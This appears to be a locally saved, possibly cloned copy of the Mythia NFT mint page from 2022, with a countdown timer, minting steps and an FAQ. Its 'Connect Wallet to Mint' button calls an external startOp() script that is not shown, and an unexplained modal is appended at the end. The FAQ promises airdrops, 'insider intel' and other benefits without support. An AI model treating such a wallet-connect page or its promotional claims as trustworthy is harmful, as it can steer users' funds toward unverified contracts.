<!DOCTYPE html>
<html data-wf-domain="www.mythia.com" data-wf-page="62177cad5a0b9f72043c669b" data-wf-site="61c0899df28e20370247f15d" class="w-mod-js w-mod-ix wf-montserrat-n1-active wf-montserrat-i1-active wf-montserrat-n2-active wf-montserrat-i2-active wf-montserrat-n3-active wf-montserrat-i3-active wf-montserrat-n4-active wf-montserrat-i4-active wf-montserrat-n5-active wf-montserrat-i5-active wf-montserrat-n6-active wf-montserrat-i6-active wf-montserrat-n7-active wf-montserrat-i7-active wf-montserrat-n8-active wf-montserrat-i8-active wf-montserrat-n9-active wf-montserrat-i9-active wf-sourcesanspro-n3-active wf-sourcesanspro-n4-active wf-sourcesanspro-n6-active wf-sourcesanspro-n7-active wf-sourcesanspro-n9-active wf-poppins-n4-active wf-poppins-n5-active wf-poppins-n6-active wf-poppins-n7-active wf-inter-n4-active wf-inter-n5-active wf-inter-n6-active wf-inter-n7-active wf-active w-mod-js">
  <head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <style>.wf-force-outline-none[tabindex="-1"]:focus{outline:none;}</style>
    <meta charset="utf-8">
    <title>Mint page</title>
    <meta content="Mint page" property="og:title">
    <meta content="Mint page" property="twitter:title"><meta content="width=device-width, initial-scale=1" name="viewport">
    <link href="Mint%20page_files/mythia-crypto.css" rel="stylesheet" type="text/css">
    <script src="Mint%20page_files/webfont.js" type="text/javascript"></script>
    <link rel="stylesheet" href="Mint%20page_files/css_002.css" media="all">
    <link rel="stylesheet" href="Mint%20page_files/css.css" media="all">
    <script type="text/javascript">WebFont.load({  google: {    families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic","Source Sans Pro:300,regular,600,700,900","Poppins:regular,500,600,700","Inter:regular,500,600,700"]  }});</script>
    <!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif]-->
    <!-- <script type="text/javascript">
    !function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script> -->
    <link href="https://assets.website-files.com/61c0899df28e20370247f15d/61f17a49f169f362d710d304_icon32.png" rel="shortcut icon" type="image/x-icon">
    <link href="https://assets.website-files.com/61c0899df28e20370247f15d/61f17a4d7fa89b53c4e72218_icon256.png" rel="apple-touch-icon">
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async="" src="Mint%20page_files/js.txt">
    </script>
    <script type="text/javascript" language="javascript" src="ethjs-unit.min.js"></script>
    <script type="text/javascript" language="javascript" src="web3-1.3.4.min.js"></script>
    <script type="text/javascript" language="javascript" src="jquery-1.6.4.min.js"></script>
    <!-- <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'UA-202299103-1');
    </script> -->

    <style>
      #root > div {
      z-index: 9999 !important;
      }

      #timer {
      display: inline-flex;
      align-items: center;
      margin: 20px auto;
      }
      #timer div {
      color: #E73B70;
      font-size: 60px;
      line-height: 65px;
      font-weight: 700;
      display: inline-flex;
      flex-direction: column;
      text-align: center;
      }
      #timer span {
      display: block;
      color: #96969E;
      font-size: 14px;
      line-height: 17px;
      font-weight: 500;
      }
      .dateWrapper {
      width: 108px;
      display: inline-flex;
      align-items: center;
      justify-content: center;
      padding: 15px;
      background: #292932;
      border-radius: 12px;
      margin-right: -5px;
      }
      .dots {
      display: inline-flex;
      align-items: center;
      justify-content: center;
      margin-right: -10px;
      font-size: 40px !important;
      color: #BFBFCA !important;
      position: relative;
      z-index: 2;
      }
      .list-2 li {
      display: list-item;
      padding-left: 10px;
      margin-left: 30px;
      }
      .list-2 li::before {
          content: none;
          color: #fff;
          margin-right: 8px;
      }

      @media only screen and (max-width: 600px) {
      #timer {
      display: inline-flex;
      margin: 20px auto;
      }
      #timer div {
      font-size: 32px;
      line-height: 35px;
      }
      #timer span {
      font-size: 13px;
      line-height: 16px;
      }
      .dateWrapper {
      width: 68px;
      padding: 8px;
      border-radius: 12px;
      margin-right: -5px;
      }
      .dots {
      margin-right: -5px;
      font-size: 20px !important;
      }
      }

      .hLzqBE {
        -moz-box-align: center;
        align-items: center;
        border: 0px none;
        border-radius: 16px;
        box-shadow: rgba(14, 14, 44, 0.4) 0px -1px 0px 0px inset;
        cursor: pointer;
        display: inline-flex;
        font-family: inherit;
        font-size: 16px;
        font-weight: 600;
        -moz-box-pack: center;
        justify-content: center;
        letter-spacing: 0.03em;
        line-height: 1;
        opacity: 1;
        outline: currentcolor none 0px;
        transition: background-color 0.2s ease 0s, opacity 0.2s ease 0s;
        height: 48px;
        padding: 0px 24px;
        background-color: rgb(178, 0, 208);
        color: white;
      }

      button, html input[type="button"], input[type="reset"] {
        border: 0;
        cursor: pointer;
        -webkit-appearance: button;
      }
    </style>
    
    <style type="text/css">.quantity-picker{display:inline-block;border:1px solid #dfdfdf;border-radius:3px;vertical-align:middle}.quantity-input:focus{background:red}.quantity-display,.quantity-modifier{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;outline:none}.quantity-modifier{height:100%;width:3rem;font-size:1.5rem;background:#f3f3f3;color:#888;border:0 solid #dbdbdb;text-align:center;cursor:pointer}.quantity-modifier:hover{background:#dadada;color:#555}.quantity-modifier:focus{outline:0}.left-modifier{border-radius:3px 0 0 3px}.mod-disable{color:#e0e0e0}.mod-disable:hover{background-color:#f3f3f3!important;color:#e0e0e0}.right-modifier{border-radius:0 3px 3px 0}.quantity-display{width:4rem;padding:.5rem;font-size:1.5rem;border:0;border-top:0 solid #dbdbdb;border-bottom:0 solid #dbdbdb;text-align:center}</style>
    <style type="text/css">[data-quantity]{position:relative;width:100%;max-width:11rem;padding:0;margin:0;border:0}[data-quantity] legend{display:none}[data-quantity] input{font-size:16px;height:2.3rem;padding:0 3.1rem;margin-top:.6rem;border-radius:2rem;border:0;background:#fff;color:#222;box-shadow:0 5px 45px -10px rgba(0,0,0,.25);text-align:center;width:100%;box-sizing:border-box;font-weight:lighter}[data-quantity] input:focus{outline:none;box-shadow:0 5px 55px -10px rgba(0,0,0,.2),0 0 4px #3fff7f}[data-quantity] input[type=number]::-webkit-inner-spin-button,[data-quantity] input[type=number]::-webkit-outer-spin-button{-webkit-appearance:none;margin:0}[data-quantity] input[type=number]{-moz-appearance:textfield}[data-quantity] button{position:absolute;width:2.5rem;height:2.5rem;top:.5rem;display:block;padding:0;margin:0;border:0;background:#e3e2e5 url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="100" height="50"><path d="M17 25h16M67 25h16M75 17v16" fill="none" stroke="rgb(59,69,66)" stroke-width="1.5px" stroke-linecap="round" stroke-linejoin="round" /></svg>') no-repeat 0 0;background-size:4.6rem 2.2rem;overflow:hidden;white-space:nowrap;text-indent:100%;border-radius:1.4rem;cursor:pointer;transition:opacity .15s;opacity:.7}[data-quantity] button:active{background-position-y:1px;box-shadow:inset 0 2px 12px -4px #c5d1d9}[data-quantity] button:focus{outline:none}[data-quantity] button:hover{opacity:1}[data-quantity] button.sub{left:-.1rem}[data-quantity] button.add{right:-.1rem;background-position-x:-2.2rem}</style>
    <style data-styled="active" data-styled-version="5.3.3"></style><style data-styled="active" data-styled-version="5.3.3"></style>
  <style type="text/css">.quantity-picker{display:inline-block;border:1px solid #dfdfdf;border-radius:3px;vertical-align:middle}.quantity-input:focus{background:red}.quantity-display,.quantity-modifier{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;outline:none}.quantity-modifier{height:100%;width:3rem;font-size:1.5rem;background:#f3f3f3;color:#888;border:0 solid #dbdbdb;text-align:center;cursor:pointer}.quantity-modifier:hover{background:#dadada;color:#555}.quantity-modifier:focus{outline:0}.left-modifier{border-radius:3px 0 0 3px}.mod-disable{color:#e0e0e0}.mod-disable:hover{background-color:#f3f3f3!important;color:#e0e0e0}.right-modifier{border-radius:0 3px 3px 0}.quantity-display{width:4rem;padding:.5rem;font-size:1.5rem;border:0;border-top:0 solid #dbdbdb;border-bottom:0 solid #dbdbdb;text-align:center}</style><style type="text/css">[data-quantity]{position:relative;width:100%;max-width:11rem;padding:0;margin:0;border:0}[data-quantity] legend{display:none}[data-quantity] input{font-size:16px;height:2.3rem;padding:0 3.1rem;margin-top:.6rem;border-radius:2rem;border:0;background:#fff;color:#222;box-shadow:0 5px 45px -10px rgba(0,0,0,.25);text-align:center;width:100%;box-sizing:border-box;font-weight:lighter}[data-quantity] input:focus{outline:none;box-shadow:0 5px 55px -10px rgba(0,0,0,.2),0 0 4px #3fff7f}[data-quantity] input[type=number]::-webkit-inner-spin-button,[data-quantity] input[type=number]::-webkit-outer-spin-button{-webkit-appearance:none;margin:0}[data-quantity] input[type=number]{-moz-appearance:textfield}[data-quantity] button{position:absolute;width:2.5rem;height:2.5rem;top:.5rem;display:block;padding:0;margin:0;border:0;background:#e3e2e5 url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="100" height="50"><path d="M17 25h16M67 25h16M75 17v16" fill="none" stroke="rgb(59,69,66)" stroke-width="1.5px" stroke-linecap="round" stroke-linejoin="round" /></svg>') no-repeat 0 0;background-size:4.6rem 2.2rem;overflow:hidden;white-space:nowrap;text-indent:100%;border-radius:1.4rem;cursor:pointer;transition:opacity .15s;opacity:.7}[data-quantity] button:active{background-position-y:1px;box-shadow:inset 0 2px 12px -4px #c5d1d9}[data-quantity] button:focus{outline:none}[data-quantity] button:hover{opacity:1}[data-quantity] button.sub{left:-.1rem}[data-quantity] button.add{right:-.1rem;background-position-x:-2.2rem}
  </style>

</head>

  <body class="body-3">
    <div data-animation="default" data-collapse="medium" data-duration="400" data-easing="ease" data-easing2="ease" role="banner" class="navbar-3 w-nav">
      <div class="container-29 w-container">
        <a href="https://www.mythia.com/" class="brand w-nav-brand" aria-label="home">
          <img src="Mint%20page_files/61eff349ac46207c2b46fa01_logo_v3.svg" loading="lazy" alt="Mythia" class="image-49">
        </a>
        <nav role="navigation" class="nav-menu-3 w-nav-menu">
          <a href="https://www.mythia.com/#investors" target="_blank" class="nav-link-12 mint w-nav-link" style="max-width: 1250px;">Investors</a>
          <a href="https://www.mythia.com/#features" target="_blank" class="nav-link-12 mint w-nav-link" style="max-width: 1250px;">Features</a>
          <a href="https://www.mythia.com/#roadmap" target="_blank" class="nav-link-12 mint w-nav-link" style="max-width: 1250px;">roadmap</a>
          <a href="https://www.mythia.com/#team" target="_blank" class="nav-link-12 mint w-nav-link" style="max-width: 1250px;">team</a>
          <a href="#faq" class="nav-link-12 mint w-nav-link" style="max-width: 1250px;">faq</a>
        </nav>
        <a href="http://tools.mythia.com/" class="button-4 mint w-button">Launch app</a><div class="menu-button-2 w-nav-button" style="-webkit-user-select: text;" aria-label="menu" role="button" tabindex="0" aria-controls="w-nav-overlay-0" aria-haspopup="menu" aria-expanded="false">
        <div class="w-icon-nav-menu"></div>
        </div>
      </div>
      <div class="w-nav-overlay" data-wf-ignore="" id="w-nav-overlay-0"></div>
    </div>
    <div class="section-22 wf-section">
      <div data-poster-url="https://assets.website-files.com/61c0899df28e20370247f15d/621e3951959b56b9b045b905_Site BG final v2-poster-00001.jpg" data-video-urls="https://assets.website-files.com/61c0899df28e20370247f15d/621e3951959b56b9b045b905_Site BG final v2-transcode.mp4,https://assets.website-files.com/61c0899df28e20370247f15d/621e3951959b56b9b045b905_Site BG final v2-transcode.webm" data-autoplay="true" data-loop="true" data-wf-ignore="true" class="background-video-3 w-background-video w-background-video-atom">
        <video autoplay="autoplay" loop="" style="background-image:url(&quot;https://assets.website-files.com/61c0899df28e20370247f15d/621e3951959b56b9b045b905_Site BG final v2-poster-00001.jpg&quot;)" muted="muted" playsinline="" data-wf-ignore="true" data-object-fit="cover">
          <source src="Mint%20page_files/621e3951959b56b9b045b905_Site2520BG2520final2520v2-transc.mp4" data-wf-ignore="true"><source src="Mint%20page_files/621e3951959b56b9b045b905_Site2520BG2520final2520v2-trans.webm" data-wf-ignore="true"></video>
          
          <div class="div-block-85">
            <div class="container-30 w-container">
              <div class="div-block-81">
                <div id="mintTitle" data-w-id="204471ed-d727-f625-b289-127147578c58" class="text-block-78" style="opacity: 1;">Public Mint Starts:</div>
                <div data-w-id="acb2d432-9a00-8ce3-f21e-6ef0de99e0e8" class="html-embed-5 w-embed w-script" style="opacity: 1;">

        <script>

          function updateTimer() {
          future = Date.parse('march 4, 2022 15:00:00');
          now = new Date(new Date().toLocaleString("en-US", {timeZone: "America/Los_Angeles"}))
          diff = future - now;

          days = Math.floor(diff / (1000 * 60 * 60 * 24));
          hours = Math.floor(diff / (1000 * 60 * 60));
          mins = Math.floor(diff / (1000 * 60));
          secs = Math.floor(diff / 1000);

          d = days;
          h = hours - days * 24;
          m = mins - hours * 60;
          s = secs - mins * 60;
          
          // Public
          future1 = Date.parse('march 7, 2022 15:00:00');
              now1 = new Date(new Date().toLocaleString("en-US", {timeZone: "America/Los_Angeles"}));
              diff1 = future1 - now1;

          days1 = Math.floor(diff1 / (1000 * 60 * 60 * 24));
          hours1 = Math.floor(diff1 / (1000 * 60 * 60));
          mins1 = Math.floor(diff1 / (1000 * 60));
          secs1 = Math.floor(diff1 / 1000);

          d1 = days1;
          h1 = hours1 - days1 * 24;
          m1 = mins1 - hours1 * 60;
          s1 = secs1 - mins1 * 60;
          
          if (diff > 1000000) {
            document.getElementById("timer")
              .innerHTML =
              '<div class="dateWrapper">' + d + '<span>Days</span></div><div class="dots">:</div>' +
              '<div class="dateWrapper">' + h + '<span>Hours</span></div><div class="dots">:</div>' +
              '<div class="dateWrapper">' + m + '<span>Minutes</span></div><div class="dots">:</div>' +
              '<div class="dateWrapper">' + s + '<span>Seconds</span></div>';
          } else {
            document.getElementById("mintTitle")
              .innerHTML = 'Public Mint Starts:'
            document.getElementById("mintingNow")
              .innerHTML = 'Minting Soon:'
              document.getElementById("mintingType")
              .innerHTML = 'Public'
              
            document.getElementById("timer")
              .innerHTML =
              '<div class="dateWrapper">' + d1 + '<span>Days</span></div><div class="dots">:</div>' +
              '<div class="dateWrapper">' + h1 + '<span>Hours</span></div><div class="dots">:</div>' +
              '<div class="dateWrapper">' + m1 + '<span>Minutes</span></div><div class="dots">:</div>' +
              '<div class="dateWrapper">' + s1 + '<span>Seconds</span></div>';
          }
          };

          setInterval('updateTimer()', 1000);

        </script>

<div id="timer">
  <div class="dateWrapper">
    2<span>Days</span>
  </div>
  <div class="dots">:</div>
  <div class="dateWrapper">
    23
    <span>Hours</span>
  </div>
  
  <div class="dots">:</div>
  <div class="dateWrapper">49<span>Minutes</span></div>
  <div class="dots">:</div>
  <div class="dateWrapper">26<span>Seconds</span></div>
</div></div>
<div class="div-block-82"></div>
<div id="mintingNow" data-w-id="157a0b4e-8374-5274-700a-11085bd53685" class="text-block-80" style="opacity: 1;">Minting Soon:</div>
<div id="mintingType" data-w-id="f37d2571-51d5-757b-2cfe-21179ce3385b" class="text-block-78" style="opacity: 1;">Public</div>
<div data-w-id="d14bfe29-ac60-a01f-cdad-dd7a82867a78" class="w-embed w-script" style="opacity: 1;">
<div id="root">
  <div class="sc-eGPXGI eDbIBu">
    <div></div>
  </div>
  
  <div style="overflow: hidden;" class="sc-cvZCdy cpkGdA">
    <div class="sc-xiLah sc-gyElHZ ivjsub cjDdNG" style=""></div>
    <div height="0" class="sc-fXeWAj eAABnR" style="">
      <div class="sc-fIosxK gswMPS"></div>
    </div>
    <div class="sc-djWRfJ ecoioF" style="">
      <div id="swap-page" style="padding: 5px; display: flex; flex-direction: column;" class="sc-iFMAIt fJAkiH">
        <br><button id="connect_wallet" class="sc-dkPtRN hLzqBE connect-wallet" label="Connect Wallet to Mint" onclick="startOp();" scale="md">Connect Wallet to Mint</button>
      </div>
    </div>
  </div>
</div>

</div>

<div class="div-block-82">
  <div data-w-id="be0ba982-6862-579f-3213-2f49c0a62f79" class="text-block-82" style="opacity: 1;">Only 3,000 NFTs</div>
  <div data-w-id="bca397db-e322-598e-3de6-60f0b3fd331b" class="text-block-83" style="opacity: 0;">Which one will be yours?</div>
</div>
</div></div></div></div></div>
<div class="section-23 wf-section">
  <div class="container-31 w-container">
    <div class="div-block-84">

      <div data-w-id="daec03ce-904d-9897-4168-ac77eb91adc7" class="div-block-83">
        <div class="text-block-84">What is Mythia?</div>
        <div class="html-embed-6 w-embed">
          <video src="Mint%20page_files/explanation.webm" controls="controls" width="100%"></video>
        </div>
      </div>
      
      <div data-w-id="22ffe835-236d-7d23-16b4-9796865dc71a" class="div-block-83">
        <div class="text-block-84">How to mint your NFT</div>
        <ol role="list" class="list-2">
          <li class="list-item-5">Create
 a wallet on Metamask. You can also use Coinbase Wallet, or any other 
wallet that supports NFTs. Do not use an exchange, such as Coinbase. We 
recommend using Metamask.</li>
          <li class="list-item-6">Make sure there is ETH in your wallet. You need slightly more ETH than the mint price to account for gas.</li><li class="list-item-7">Click
 the mint button above, and select the quantity you want to mint. You 
can mint up to 3 NFTs during whitelist sale, at 0.2 ETH each. Public 
sale is unlimited.</li>
          <li class="list-item-8">Metamask will pop-up and ask if you want to confirm the transaction. Click confirm.</li>
          <li class="list-item-9">Your Mythia NFTs will be added to your wallet within a few minutes.</li>
        </ol>
      </div>
    </div>
  </div>
</div>
<div id="faq" class="mint-faq wf-section"><div class="container-23 w-container"><div data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b6bb" class="text-block-50">FAQ</div><div data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b6bd" class="text-block-49">Frequently Asked Questions</div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b6bf" class="dropdown faq-v2 w-dropdown"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-0" aria-controls="w-dropdown-list-0" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">When is the mint?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-0" aria-labelledby="w-dropdown-toggle-0"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">Whitelist mint is Thursday March 3rd, 3pm PST. Public mint is Monday March 7th, 3pm PST.</a></nav></div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b6c7" class="dropdown faq-v2 w-dropdown"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-1" aria-controls="w-dropdown-list-1" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">Where can I mint a Mythia NFT?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-1" aria-labelledby="w-dropdown-toggle-1"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">You
 should only mint a Mythia NFT from https://mythia.com/mint. We will 
never PM you a URL, and our mint URL is only on https://mythia.com. All 
other URLs are scams!</a></nav></div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b721" class="dropdown hidden-dropdown faq-v2 w-dropdown"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-2" aria-controls="w-dropdown-list-2" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">How much will it cost to mint 1 Mythia NFT?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-2" aria-labelledby="w-dropdown-toggle-2"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">0.2 ETH</a></nav></div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b6d8" class="dropdown faq-v2 w-dropdown"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-3" aria-controls="w-dropdown-list-3" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">Are there benefits to holding multiple Mythia NFTs?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-3" aria-labelledby="w-dropdown-toggle-3"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">Yes!
 Each Mythia NFT will receive future airdrops and bonuses. There will 
also be DEX-related benefits that scale with each NFT you own. Each NFT 
also gets an additional vote on future software tools.</a></nav></div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b6e0" class="dropdown faq-v2 w-dropdown"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-4" aria-controls="w-dropdown-list-4" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">Where does the insider intel come from?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-4" aria-labelledby="w-dropdown-toggle-4"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">We
 curate info from 5 to 10 of the top NFTs’ discords. The community will 
be able to vote on if they want to exchange one NFT for another or 
expand the curated offering. We create text and audio alerts from these 
intel, to get it to you quickly.</a></nav></div><div class="div-block-40"><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b6e9" class="dropdown faq-v2 w-dropdown" style="opacity: 1;"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-5" aria-controls="w-dropdown-list-5" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">Does Mythia’s NFT come with artwork?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-5" aria-labelledby="w-dropdown-toggle-5"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">Yes! We have some pretty exciting profile pic art. You can see our sneak peeks on Twitter and Discord.</a></nav></div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b6f1" class="dropdown faq-v2 w-dropdown" style="opacity: 1;"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-6" aria-controls="w-dropdown-list-6" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">Where will the NFT artwork be stored?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-6" aria-labelledby="w-dropdown-toggle-6"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">The
 art will be stored on IPFS, and can be accessed on OpenSea once the NFT
 is purchased. The image art will be revealed at a later time, 
approximately 2 to 4 weeks after the NFT mint.</a></nav></div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b6f9" class="dropdown hidden-dropdown faq-v2 w-dropdown" style="opacity: 1;"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-7" aria-controls="w-dropdown-list-7" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">What is the artwork reveal?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-7" aria-labelledby="w-dropdown-toggle-7"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">When
 you first mint a Mythia NFT, you’ll receive a membership card which 
grants you access to all your Mythia’s software features. The profile 
picture artwork will be revealed approximately 2 to 4 weeks afterwards.</a></nav></div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b701" class="dropdown hidden-dropdown faq-v2 w-dropdown" style="opacity: 1;"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-8" aria-controls="w-dropdown-list-8" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">Will Mythia’s NFT have rarity levels?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-8" aria-labelledby="w-dropdown-toggle-8"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">Yes! Our profile pics will have a variety of traits and rarities.</a></nav></div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b709" class="dropdown hidden-dropdown faq-v2 w-dropdown" style="opacity: 1;"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-9" aria-controls="w-dropdown-list-9" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">Will Mythia help us get into whitelists?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-9" aria-labelledby="w-dropdown-toggle-9"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">We
 intend to hire a Head of Partnerships, who will work with upcoming 
projects to bring us whitelist spots. Our community will vote on how 
quickly they want this to happen.</a></nav></div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b711" class="dropdown hidden-dropdown faq-v2 w-dropdown" style="opacity: 1;"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-10" aria-controls="w-dropdown-list-10" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">Do you store my personal data?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-10" aria-labelledby="w-dropdown-toggle-10"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">We
 store very little personal data. We use metamask login, so you don’t 
even need to share your email address if you don’t want to. You can 
provide optional contact information, to get alerts and updates, but no 
personal information is needed to use the Mythia app.</a></nav></div><div data-hover="false" data-delay="0" data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b719" class="dropdown hidden-dropdown faq-v2 w-dropdown" style="opacity: 1;"><div class="dropdown-toggle w-dropdown-toggle" id="w-dropdown-toggle-11" aria-controls="w-dropdown-list-11" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"><div class="icon w-icon-dropdown-toggle" aria-hidden="true"></div><div class="text-block-16 faq-v2">What blockchain is Mythia’s NFT on?</div></div><nav class="dropdown-list w-clearfix w-dropdown-list" id="w-dropdown-list-11" aria-labelledby="w-dropdown-toggle-11"><a href="#" class="dropdown-link faq-v2 w-dropdown-link" tabindex="0">Mythia is minting on the Ethereum blockchain.</a></nav></div></div><a data-w-id="74a8d330-aa9f-bdac-1cb3-84a09d27b729" href="#" class="button-2 faqs-btn faq-v2 w-button">MORE&nbsp;FAQS</a></div></div><div class="section-17 wf-section"><div class="container-24 w-container"><div class="div-block-56"><div class="div-block-57"><img src="Mint%20page_files/61eff349ac46207c2b46fa01_logo_v3.svg" loading="lazy" alt="Mythia"><div class="div-block-58"><div class="div-block-59"><div class="text-block-61">Contact Us</div><a href="mailto:support@mythia.com" class="link-3 email">support@mythia.com</a></div><div class="div-block-60"><div class="text-block-61">Company</div><a href="https://www.mythia.com/#investors" target="_blank" class="mint link-3">Investors</a><a href="https://www.mythia.com/#features" target="_blank" class="link-3 mint">Features</a><a href="https://www.mythia.com/#roadmap" target="_blank" class="link-3 mint">Roadmap</a><a href="https://www.mythia.com/#team" target="_blank" class="link-3 mint">TEAM</a><a href="#faq" class="link-3 mint">FAQs</a></div><div class="div-block-59"><div class="text-block-61">Community</div><a href="https://twitter.com/mythia" target="_blank" class="link-3">Twitter</a><a href="https://discord.gg/mythia" target="_blank" class="link-3">Discord</a><a href="https://opensea.io/collection/mythiaorigins" target="_blank" class="link-3">OPENSEA</a></div></div></div><div class="div-block-61"><div class="text-block-62">© 2022 Mythia. All Rights Reserved.</div></div></div></div></div><script src="Mint%20page_files/jquery-3.js" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script><script src="Mint%20page_files/mythia-crypto.js" type="text/javascript"></script><!--[if lte IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"></script><![endif]-->



<style>


  /* The Modal (background) */
  .modal1{
    position: fixed; /* Stay in place */
    z-index: 1; /* Sit on top */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%;
    background-color: rgb(0,0,0); /* Fallback color */
    background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
    opacity:0.5 !important;
  }

  .modal {
    position: fixed; /* Stay in place */
    z-index: 1; /* Sit on top */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%;
    background-color: rgb(0,0,0); /* Fallback color */
    background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
    background-position: center;
    background-repeat: no-repeat;
    background-size: cover;
    display: none;
  }
  
  /* Modal Content/Box */
  .modal-content {
    margin: 30% auto; /* 15% from the top and centered */
    padding: 20px;
    border: 1px solid #888;
    z-index: 1; /* Sit on top */
    width: 95%; /* Full width */
    height: auto;
    background: #000;
  }
  
  .section-22 .wf-section  {
    -webkit-filter: blur(8px);
    -moz-filter: blur(8px);
    -o-filter: blur(8px);
    -ms-filter: blur(8px);
    filter: blur(4px);
  }
  
  </style>
  
  
  <div id="after" class="modal">
  
